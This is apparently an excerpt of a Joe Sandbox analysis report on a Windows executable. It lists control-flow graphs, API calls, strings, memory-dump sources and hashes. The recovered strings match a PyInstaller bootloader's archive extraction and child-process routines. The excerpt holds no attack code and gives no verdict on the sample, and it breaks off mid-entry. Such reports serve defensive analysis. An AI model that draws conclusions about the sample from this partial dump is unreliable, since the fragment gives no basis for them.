7ff6d6eb6e9b-7ff6d6eb6f0f call 7ff6d6ebb580 * 4 call 7ff6d6eb39ac call 7ff6d6eb7064 * 2 978->987 979->978 984 7ff6d6eb6e91-7ff6d6eb6e97 979->984 982->958 984->987 987->968 989->982 990->957
APIs
• _get_daylight.LIBCMT ref: 00007FF6D6EB6DFA
  • Part of subcall function 00007FF6D6EB6548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB655C
• _get_daylight.LIBCMT ref: 00007FF6D6EB6E0B
  • Part of subcall function 00007FF6D6EB64E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB64FC
• _get_daylight.LIBCMT ref: 00007FF6D6EB6E1C
  • Part of subcall function 00007FF6D6EB6518: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB652C
  • Part of subcall function 00007FF6D6EAB700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB716
  • Part of subcall function 00007FF6D6EAB700: GetLastError.KERNEL32(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB720
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D6EB705C), ref: 00007FF6D6EB6E43
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
• String ID: W. Europe Standard Time$W. Europe Summer Time
• API String ID: 2248164782-690618308
• Opcode ID: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
• Instruction ID: 2b1855ee9126e6ce828763ed9eafb49e95a8cea8db4fe1c15b79c6345b2bff43
• Opcode Fuzzy Hash: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
• Instruction Fuzzy Hash: 8B515D32E1C7428AE720DF29E8915AD7760BF88784F444137EA4DC7A96DF3EE4618B40
APIs
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
• Instruction ID: ca9a509348f7e4ed56ee40be18bdca216b8659dcb9615e1354e55280b3b29332
• Opcode Fuzzy Hash: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
• Instruction Fuzzy Hash: 57F03122E1C78586EBA08F64A48976E7360AF44B68F440A37D66D466E4DF3DD028DB00

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 7ff6d6e91700-7ff6d6e91714 1 7ff6d6e9172e-7ff6d6e91732 0->1 2 7ff6d6e91716-7ff6d6e9172d call 7ff6d6e92b10 0->2 4 7ff6d6e91734-7ff6d6e9173d call 7ff6d6e912a0 1->4 5 7ff6d6e91758-7ff6d6e9177b call 7ff6d6e97e20 1->5 11 7ff6d6e9174f-7ff6d6e91757 4->11 12 7ff6d6e9173f-7ff6d6e9174a call 7ff6d6e92b10 4->12 13 7ff6d6e917a9-7ff6d6e917c4 call 7ff6d6e94060 5->13 14 7ff6d6e9177d-7ff6d6e917a8 call 7ff6d6e92870 5->14 12->11 20 7ff6d6e917de-7ff6d6e917f1 call 7ff6d6ea1004 13->20 21 7ff6d6e917c6-7ff6d6e917d9 call 7ff6d6e92b10 13->21 27 7ff6d6e91813-7ff6d6e91817 20->27 28 7ff6d6e917f3-7ff6d6e9180e call 7ff6d6e92870 20->28 26 7ff6d6e9191f-7ff6d6e91922 call 7ff6d6ea097c 21->26 35 7ff6d6e91927-7ff6d6e9193e 26->35 31 7ff6d6e91831-7ff6d6e91851 call 7ff6d6ea5780 27->31 32 7ff6d6e91819-7ff6d6e91825 call 7ff6d6e91050 27->32 38 7ff6d6e91917-7ff6d6e9191a call 7ff6d6ea097c 28->38 40 7ff6d6e91872-7ff6d6e91878 31->40 41 7ff6d6e91853-7ff6d6e9186d call 7ff6d6e92870 31->41 39 7ff6d6e9182a-7ff6d6e9182c 32->39 38->26 39->38 44 7ff6d6e9187e-7ff6d6e91887 40->44 45 7ff6d6e91905-7ff6d6e91908 call 7ff6d6ea576c 40->45 49 7ff6d6e9190d-7ff6d6e91912 41->49 48 7ff6d6e91890-7ff6d6e918b2 call 7ff6d6ea0ccc 44->48 45->49 52 7ff6d6e918b4-7ff6d6e918cc call 7ff6d6ea140c 48->52 53 7ff6d6e918e5-7ff6d6e918ec 48->53 49->38 59 7ff6d6e918ce-7ff6d6e918d1 52->59 60 7ff6d6e918d5-7ff6d6e918e3 52->60 54 7ff6d6e918f3-7ff6d6e918fb call 7ff6d6e92870 53->54 61 7ff6d6e91900 54->61 59->48 62 7ff6d6e918d3 59->62 60->54 61->45 62->61
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: Message
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
• API String ID: 2030045667-3833288071
• Opcode ID: ce432d049608e7a4cf79a9e419cc4416eb167f8c11d13a2ab0148bd49c23ab9d
• Instruction ID: d7079d9effecefaa9733c8c56cff6064a72b092664b0488a3733d4e1f3d58a0b
• Opcode Fuzzy Hash: ce432d049608e7a4cf79a9e419cc4416eb167f8c11d13a2ab0148bd49c23ab9d
• Instruction Fuzzy Hash: A451AB61F1C64386EA249B16E4402BD63A1BF49BD8F444033EE4DC76A6EF3EE565D300

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: _fread_nolock$Message
• String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
• API String ID: 677216364-1384898525
• Opcode ID: 32bbf4993e78d2fc4699dd219bcbf087d33e3246068c4f4700ffaa45a66d02fc
• Instruction ID: 7d12625e96c2034d18debfba716cf8292981bd741a965d3fa6f0980b8a448b2d
• Opcode Fuzzy Hash: 32bbf4993e78d2fc4699dd219bcbf087d33e3246068c4f4700ffaa45a66d02fc
• Instruction Fuzzy Hash: 6A516871E0D64286EB28DF28E4901BC77A0EF48B88B518137DA0DC7799DF2EE460CB04

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
• String ID: CreateProcessW$Error creating child process!
• API String ID: 2895956056-3524285272
• Opcode ID: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
• Instruction ID: 9d6a00b2a7435be7504e8c7f1e7a9933d073bff73aa73946bfd63b1fc8206413
• Opcode Fuzzy Hash: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
• Instruction Fuzzy Hash: 72410D32E0C78281DA209B64E4552AEB3A4FF94764F500737E6AE87AD5DF7DD064CB40

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 511 7ff6d6e91050-7ff6d6e910ab call 7ff6d6e9b840 514 7ff6d6e910d3-7ff6d6e910eb call 7ff6d6ea5780 511->514 515 7ff6d6e910ad-7ff6d6e910d2 call 7ff6d6e92b10 511->515 520 7ff6d6e91109-7ff6d6e91119 call 7ff6d6ea5780 514->520 521 7ff6d6e910ed-7ff6d6e91104 call 7ff6d6e92870 514->521 527 7ff6d6e91137-7ff6d6e91149 520->527 528 7ff6d6e9111b-7ff6d6e91132 call 7ff6d6e92870 520->528 526 7ff6d6e91264-7ff6d6e91279 call 7ff6d6e9b520 call 7ff6d6ea576c * 2 521->526 543 7ff6d6e9127e-7ff6d6e91298 526->543 530 7ff6d6e91150-7ff6d6e91175 call 7ff6d6ea0ccc 527->530 528->526 538 7ff6d6e9117b-7ff6d6e91185 call 7ff6d6ea0a40 530->538 539 7ff6d6e9125c 530->539 538->539 544 7ff6d6e9118b-7ff6d6e91197 538->544 539->526 545 7ff6d6e911a0-7ff6d6e911c8 call 7ff6d6e99c80 544->545 548 7ff6d6e91241-7ff6d6e91257 call 7ff6d6e92b10 545->548 549 7ff6d6e911ca-7ff6d6e911cd 545->549 548->539 550 7ff6d6e911cf-7ff6d6e911d9 549->550 551 7ff6d6e9123c 549->551 553 7ff6d6e91203-7ff6d6e91206 550->553 554 7ff6d6e911db-7ff6d6e911e8 call 7ff6d6ea140c 550->554 551->548 555 7ff6d6e91208-7ff6d6e91216 call 7ff6d6ebaee0 553->555 556 7ff6d6e91219-7ff6d6e9121e 553->556 560 7ff6d6e911ed-7ff6d6e911f0 554->560 555->556 556->545 559 7ff6d6e91220-7ff6d6e91223 556->559 562 7ff6d6e91225-7ff6d6e91228 559->562 563 7ff6d6e91237-7ff6d6e9123a 559->563 564 7ff6d6e911fe-7ff6d6e91201 560->564 565 7ff6d6e911f2-7ff6d6e911fc call 7ff6d6ea0a40 560->565 562->548 566 7ff6d6e9122a-7ff6d6e91232 562->566 563->539 564->548 565->556 565->564 566->530
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message
                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                            • Opcode ID: 0889a6de986b29688c85be3cab4202d9240b690e7679539d892e7d762bdcbe91
                                                                                                                                                            • Instruction ID: 74ff389bfbf0631f3eef993d53ce9123754a0ba61dab24a1617b9eb4b4915bd5
                                                                                                                                                            • Opcode Fuzzy Hash: 0889a6de986b29688c85be3cab4202d9240b690e7679539d892e7d762bdcbe91
                                                                                                                                                            • Instruction Fuzzy Hash: E951AC22E0D68285EA20AB55A4403FE6291BF89B98F444137EE4DC7785EF3EE565D700

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6D6EAFD5A,?,?,-00000018,00007FF6D6EABB0B,?,?,?,00007FF6D6EABA02,?,?,?,00007FF6D6EA698E), ref: 00007FF6D6EAFB3C
                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6D6EAFD5A,?,?,-00000018,00007FF6D6EABB0B,?,?,?,00007FF6D6EABA02,?,?,?,00007FF6D6EA698E), ref: 00007FF6D6EAFB48
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                            • Opcode ID: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                                                                                                                            • Instruction ID: 7c852376e38f4c6e5c220e0c460b338d299afc5bfb453625769a23fd5a74b59b
                                                                                                                                                            • Opcode Fuzzy Hash: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                                                                                                                            • Instruction Fuzzy Hash: 8C41BE21F1DB0241FA16CB16A8109B9A6B6BF45B90F094237DD0ED7794EE3EE465C300

                                                                                                                                                            Control-flow Graph

                                                                                                                                                             control_flow_graph 822 7ff6d6eac80c-7ff6d6eac832 823 7ff6d6eac834-7ff6d6eac848 call 7ff6d6ea5c94 call 7ff6d6ea5cb4 822->823 824 7ff6d6eac84d-7ff6d6eac851 822->824 838 7ff6d6eacc3e 823->838 825 7ff6d6eacc27-7ff6d6eacc33 call 7ff6d6ea5c94 call 7ff6d6ea5cb4 824->825 826 7ff6d6eac857-7ff6d6eac85e 824->826 845 7ff6d6eacc39 call 7ff6d6eab698 825->845 826->825 828 7ff6d6eac864-7ff6d6eac892 826->828 828->825 832 7ff6d6eac898-7ff6d6eac89f 828->832 835 7ff6d6eac8a1-7ff6d6eac8b3 call 7ff6d6ea5c94 call 7ff6d6ea5cb4 832->835 836 7ff6d6eac8b8-7ff6d6eac8bb 832->836 835->845 841 7ff6d6eac8c1-7ff6d6eac8c7 836->841 842 7ff6d6eacc23-7ff6d6eacc25 836->842 843 7ff6d6eacc41-7ff6d6eacc58 838->843 841->842 846 7ff6d6eac8cd-7ff6d6eac8d0 841->846 842->843 845->838 846->835 849 7ff6d6eac8d2-7ff6d6eac8f7 846->849 851 7ff6d6eac8f9-7ff6d6eac8fb 849->851 852 7ff6d6eac92a-7ff6d6eac931 849->852 853 7ff6d6eac922-7ff6d6eac928 851->853 854 7ff6d6eac8fd-7ff6d6eac904 851->854 855 7ff6d6eac933-7ff6d6eac95b call 7ff6d6eae3ac call 7ff6d6eab700 * 2 852->855 856 7ff6d6eac906-7ff6d6eac91d call 7ff6d6ea5c94 call 7ff6d6ea5cb4 call 7ff6d6eab698 852->856 858 7ff6d6eac9a8-7ff6d6eac9bf 853->858 854->853 854->856 882 7ff6d6eac978-7ff6d6eac9a3 call 7ff6d6ead034 855->882 883 7ff6d6eac95d-7ff6d6eac973 call 7ff6d6ea5cb4 call 7ff6d6ea5c94 855->883 886 7ff6d6eacab0 856->886 861 7ff6d6eac9c1-7ff6d6eac9c9 858->861 862 7ff6d6eaca3a-7ff6d6eaca44 call 7ff6d6eb476c 858->862 861->862 866 7ff6d6eac9cb-7ff6d6eac9cd 861->866 873 7ff6d6eacace 862->873 874 7ff6d6eaca4a-7ff6d6eaca5f 862->874 866->862 870 7ff6d6eac9cf-7ff6d6eac9e5 866->870 870->862 875 7ff6d6eac9e7-7ff6d6eac9f3 870->875 878 7ff6d6eacad3-7ff6d6eacaf3 ReadFile 873->878 874->873 880 7ff6d6eaca61-7ff6d6eaca73 GetConsoleMode 874->880 875->862 881 7ff6d6eac9f5-7ff6d6eac9f7 875->881 884 7ff6d6eacaf9-7ff6d6eacb01 878->884 885 7ff6d6eacbed-7ff6d6eacbf6 GetLastError 878->885 880->873 887 7ff6d6eaca75-7ff6d6eaca7d 880->887 881->862 888 7ff6d6eac9f9-7ff6d6eaca11 881->888 882->858 883->886 884->885 891 7ff6d6eacb07 884->891 894 7ff6d6eacc13-7ff6d6eacc16 885->894 895 7ff6d6eacbf8-7ff6d6eacc0e call 7ff6d6ea5cb4 call 7ff6d6ea5c94 885->895 896 7ff6d6eacab3-7ff6d6eacabd call 7ff6d6eab700 886->896 887->878 893 7ff6d6eaca7f-7ff6d6eacaa1 ReadConsoleW 887->893 888->862 889 7ff6d6eaca13-7ff6d6eaca1f 888->889 889->862 897 7ff6d6eaca21-7ff6d6eaca23 889->897 901 7ff6d6eacb0e-7ff6d6eacb23 891->901 903 7ff6d6eacac2-7ff6d6eacacc 893->903 904 7ff6d6eacaa3 GetLastError 893->904 898 7ff6d6eacaa9-7ff6d6eacaab call 7ff6d6ea5c28 894->898 899 7ff6d6eacc1c-7ff6d6eacc1e 894->899 895->886 896->843 897->862 908 7ff6d6eaca25-7ff6d6eaca35 897->908 898->886 899->896 901->896 910 7ff6d6eacb25-7ff6d6eacb30 901->910 903->901 904->898 908->862 914 7ff6d6eacb32-7ff6d6eacb4b call 7ff6d6eac424 910->914 915 7ff6d6eacb57-7ff6d6eacb5f 910->915 922 7ff6d6eacb50-7ff6d6eacb52 914->922 919 7ff6d6eacb61-7ff6d6eacb73 915->919 920 7ff6d6eacbdb-7ff6d6eacbe8 call 7ff6d6eac264 915->920 923 7ff6d6eacbce-7ff6d6eacbd6 919->923 924 7ff6d6eacb75 919->924 920->922 922->896 923->896 926 7ff6d6eacb7a-7ff6d6eacb81 924->926 927 7ff6d6eacb83-7ff6d6eacb87 926->927 928 7ff6d6eacbbd-7ff6d6eacbc8 926->928 929 7ff6d6eacba3 927->929 930 7ff6d6eacb89-7ff6d6eacb90 927->930 928->923 932 7ff6d6eacba9-7ff6d6eacbb9 929->932 930->929 931 7ff6d6eacb92-7ff6d6eacb96 930->931 931->929 933 7ff6d6eacb98-7ff6d6eacba1 931->933 932->926 934 7ff6d6eacbbb 932->934 933->932 934->923
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                                                                                                                            • Instruction ID: 5d4e67a681c4309e92d283f4597d0d5d4c1c33bac67509ec56a87dab5bae1abe
                                                                                                                                                            • Opcode Fuzzy Hash: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                                                                                                                            • Instruction Fuzzy Hash: BFC1E032E0C78791EA619B549440ABD3BB1EB80F80F594233EA4E87395DF7EE865D340

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                            • Opcode ID: b1216ed18347f8b81e820bbdb8b5f09e12cf3be39993a81172719e0d53531675
                                                                                                                                                            • Instruction ID: 92528d0d7bcb08085242739dd735a2bf50937ecbe78476bee2bef18fade48a00
                                                                                                                                                            • Opcode Fuzzy Hash: b1216ed18347f8b81e820bbdb8b5f09e12cf3be39993a81172719e0d53531675
                                                                                                                                                            • Instruction Fuzzy Hash: AB213535E0C74282EB149B59F44053EA3A1EF85BA8F144637EAAD83AE4DF7DE465C700

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: GetCurrentProcess.KERNEL32 ref: 00007FF6D6E98880
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: OpenProcessToken.ADVAPI32 ref: 00007FF6D6E98891
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: GetTokenInformation.KERNELBASE ref: 00007FF6D6E988B6
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: GetLastError.KERNEL32 ref: 00007FF6D6E988C0
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: GetTokenInformation.KERNELBASE ref: 00007FF6D6E98900
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6D6E9891C
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: CloseHandle.KERNEL32 ref: 00007FF6D6E98934
                                                                                                                                                            • LocalFree.KERNEL32(00000000,00007FF6D6E93B4E), ref: 00007FF6D6E98C0C
                                                                                                                                                            • LocalFree.KERNEL32 ref: 00007FF6D6E98C15
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                                                                            • API String ID: 6828938-1817031585
                                                                                                                                                            • Opcode ID: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                                                                                                                            • Instruction ID: e2efa90a4f81d90309ccd1215f6b614e6f5e5ade45604c80629f9f332b93f84b
                                                                                                                                                            • Opcode Fuzzy Hash: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                                                                                                                            • Instruction Fuzzy Hash: BD216A22E1C74681FA10AB20E8056FE6364EF88784F840933E94ED37A6DF3EE565C741

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF6D6E939CA), ref: 00007FF6D6E93F34
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: MessageBoxW.USER32 ref: 00007FF6D6E92AD0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
